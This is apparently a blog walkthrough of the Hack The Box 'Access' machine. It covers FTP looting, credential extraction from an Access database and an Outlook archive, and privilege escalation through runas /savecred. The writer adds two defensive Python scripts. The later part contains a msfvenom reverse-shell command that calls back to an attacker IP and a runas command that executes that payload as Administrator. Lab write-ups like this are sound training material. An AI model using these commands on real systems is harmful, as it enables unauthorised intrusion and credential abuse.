Note: In an attempt to be OSCP friendly, NONE of my write ups will utilize Metasploit. Zero. Zip. Tell your friends.
Per the usual, we'll start with our standard Nmap scan of all ports: nmap -A -p- 10.10.10.98
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-64-1024x573.png)
So port 80 is open, let’s check out the webpage:
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-65-1024x496.png)
Nothing too exciting. I also see that port 21 is open with anonymous FTP login allowed, so let's try that: ftp 10.10.10.98
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-66.png)
In the Backups directory there is a backup.mdb file, so let's get that: get backup.mdb
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-67.png)
There is also an Access Control.zip file in the Engineer directory, so let's get that too: get "Access Control.zip"
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-68.png)
Then we notice something interesting when we transfer the files: both come with a WARNING! that the file was received in ASCII mode. This could be problematic (and was) when I tried to open the files, because they displayed as corrupted. ASCII mode rewrites line endings in transit, which is harmless for text but silently damages binary files such as a .mdb or .zip. We can type binary in our FTP window to switch our transfer mode to binary.
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-69.png)
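The ASCII-mode warning is worth understanding rather than just working around. As an added example (mine, not the write-up's), the script below models what the transfer does to an archive and adds a member-level CRC check that tells a corrupted download from a good one; the sample archive is constructed in memory.

```python
import io
import struct
import zipfile
import zlib


def ascii_mode_transfer(data: bytes) -> bytes:
    """Model of an ASCII-mode FTP download from a Windows server to a Linux client:
    every CR LF pair is rewritten as a bare LF. Harmless for text, destructive for
    any binary format (zip, mdb, pst) whose bytes happen to contain 0x0D 0x0A."""
    return data.replace(b"\r\n", b"\n")


def verify_zip_members(data: bytes) -> dict:
    """Walk the zip's local file headers and recompute each member's CRC-32,
    returning {member name: True if it matches the stored CRC}. Entries that use a
    data descriptor (flag bit 3) keep their sizes after the data; marked None."""
    results, pos = {}, 0
    while data[pos:pos + 4] == b"PK\x03\x04":          # local file header signature
        flags, method, crc, csize, usize, nlen, xlen = struct.unpack_from(
            "<2xHH4xIIIHH", data, pos + 4)
        name = data[pos + 30:pos + 30 + nlen].decode("utf-8", "replace")
        start = pos + 30 + nlen + xlen
        if flags & 0x08:
            results[name] = None
            break
        body = data[start:start + csize]
        if method == 8:                                  # deflate: inflate raw stream
            try:
                body = zlib.decompressobj(-15).decompress(body)
            except zlib.error:
                body = b""
        results[name] = len(body) == usize and zlib.crc32(body) == crc
        pos = start + csize
    return results


def build_sample_zip() -> bytes:
    """Constructed stand-in for the archive pulled over FTP. Stored rather than
    deflated so the member's Windows line endings survive into the archive bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        info = zipfile.ZipInfo("notes.txt", date_time=(2020, 8, 25, 12, 0, 0))
        zf.writestr(info, "line one\r\nline two\r\n")
    return buf.getvalue()
```

The mangled output still starts with PK\x03\x04, so file still reports a Zip archive; only the CRC comparison exposes the damage, which is why re-fetching in binary mode is the fix.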
It looks like .mdb is a Microsoft Access database file. I ran apt search mdb to see what packages might let me view an .mdb file, saw mdbtools, and installed it with apt-get install mdbtools.
Now, when we do mdb-tables backup.mdb we can see the tables within this database:
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-70.png)
I'm gonna go an easy route right now and use the website www.mdbopener.com. Obviously, if this were a potentially sensitive database we wouldn't want to upload it to a third-party site. However, since this is HTB, I'm OK with it. When we open our database we see a bunch of information in a much easier to view format:
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-71-1024x699.png)
When we look at the auth user table, we can see three entries:
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-72-1024x156.png)
Cool! I also know from trying to open the .zip file downloaded earlier that it's password protected. Let's try some of these credentials:
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-73.png)
The GUI extractor was being dumb, so I tried the command-line one: 7z x "Access Control.zip" and entered access4u@security as the password.
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-74.png)
And we're presented with a .pst file, which is an Outlook e-mail archive/profile. I had to install pst-utils first with apt-get install pst-utils. After installation, I was able to run readpst 'Access Controls.pst' and was presented with the mailbox itself.
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-75.png)
We can then use cat to view the contents of the mailbox, and we're presented with a username and a password:
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-76.png)
Shell
We can use Telnet to get into the box easily enough:
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-77.png)
Once on the machine I ran systeminfo and saved the associated data in a new file on my Kali box:
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-93.png)
From here, we'll use Windows Exploit Suggester to see if any vulnerabilities stand out. First I'll navigate to where I have WES saved and update its database: ./windows-exploit-suggester.py --update
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-94-1024x94.png)
Next, we'll compare this newly updated database with the systeminfo file from our target machine: ./windows-exploit-suggester.py --database 2020-08-25-mssb.xls --systeminfo ../../Access/systeminfo.txt
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-95-1024x386.png)
Looking at these, there are some critical vulnerabilities but nothing usable for remote code execution, privilege escalation, etc. So let's move on.
After moving to C:\Users\Public\Desktop, there is a .lnk file stored here, so let's type it to see its contents:
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-96-1024x170.png)
There are two things in here worth investigating: the runas command and its /savecred switch:
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-97-1024x168.png)
RunAs allows a user to run a command as another user, and /savecred stores the supplied password in the Credential Manager so that it only has to be entered the first time RunAs is used; every later runas /savecred for that account reuses it without prompting. From dummies.com:
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-98.png)
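From the defender's side, the shortcut on the Public Desktop is the whole problem: it bakes /savecred into a runas command, so the saved Administrator credential is reusable by anyone who lands on that account. As an added example (not from the write-up), this parser reads the StringData of .lnk files following the MS-SHLLINK layout and flags any whose arguments carry /savecred; the two sample shortcuts are constructed, with placeholder target paths.

```python
import struct

# MS-SHLLINK header: 0x4C fixed bytes, ShellLink CLSID at offset 4, LinkFlags at 0x14
HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = (("name", HAS_NAME), ("relpath", HAS_REL_PATH),
                 ("workdir", HAS_WORK_DIR), ("args", HAS_ARGS), ("icon", HAS_ICON))


def lnk_strings(data: bytes) -> dict:
    """Return the StringData fields of a .lnk (relative target path, arguments, ...)."""
    if data[:4] != struct.pack("<I", HEADER_SIZE) or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = HEADER_SIZE
    if flags & HAS_ID_LIST:                   # skip LinkTargetIDList (2-byte size, then items)
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                 # skip LinkInfo (4-byte size includes itself)
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for key, bit in STRING_FIELDS:            # fixed order, each: 2-byte char count + text
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            width = 2 if flags & IS_UNICODE else 1
            raw = data[pos + 2:pos + 2 + count * width]
            fields[key] = raw.decode("utf-16-le" if width == 2 else "cp1252")
            pos += 2 + count * width
    return fields


def uses_savecred(data: bytes) -> bool:
    """True if the shortcut's command-line arguments carry runas's /savecred switch."""
    return "/savecred" in lnk_strings(data).get("args", "").lower()


def build_lnk(relpath: str, args: str) -> bytes:
    """Constructed minimal .lnk (no IDList/LinkInfo) used only as offline sample input."""
    flags = HAS_REL_PATH | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I16sI", HEADER_SIZE, LNK_CLSID, flags).ljust(HEADER_SIZE, b"\0")
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in (relpath, args))
    return header + body


# Constructed samples: one modelled on the write-up's shortcut (target path is a placeholder).
RISKY = build_lnk("..\\..\\Windows\\System32\\runas.exe",
                  '/user:Access\\Administrator /savecred "C:\\placeholder\\App.exe"')
BENIGN = build_lnk("..\\..\\Windows\\System32\\notepad.exe", "C:\\placeholder\\readme.txt")
```

To audit a real host, feed the bytes of each .lnk under C:\Users\Public\Desktop to uses_savecred; the policy "Network access: Do not allow storage of passwords and credentials for network authentication" stops Credential Manager from saving the credential in the first place.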
Now, we could use RunAs to view the root flag, but that's no fun. Let's create a reverse shell with msfvenom: msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f exe > shell.exe
If you need a refresher or a cheat sheet, I found this handy one: https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-99.png)
Next, we need to get our shell.exe over to our target machine. To do this we'll set up our Impacket SMB server: impacket-smbserver smb smb (the first argument is the share name and the second is the directory to share, so don't forget to run it from the directory above the one you want to share).
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-100.png)
Next, from our Telnet/Shell we want to add this SMB share as an accessible location from our Windows box: net use \\10.10.14.8\smb
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-101.png)
Now let’s copy over our shell: copy \\10.10.14.8\smb\shell.exe
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-102.png)
Access Denied, which means I can't write to the directory I'm in. So let's move to C:\temp and try again:
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-103.png)
Now we can use our RunAs command in conjunction with /savecred: runas /user:Access\Administrator /savecred "C:\temp\shell.exe". But first we need to start our Netcat listener to catch the reverse shell:
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-104.png)
And then run our command:
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-105.png)
![](https://thecyberjedi.com/wp-content/uploads/2020/08/image-106.png)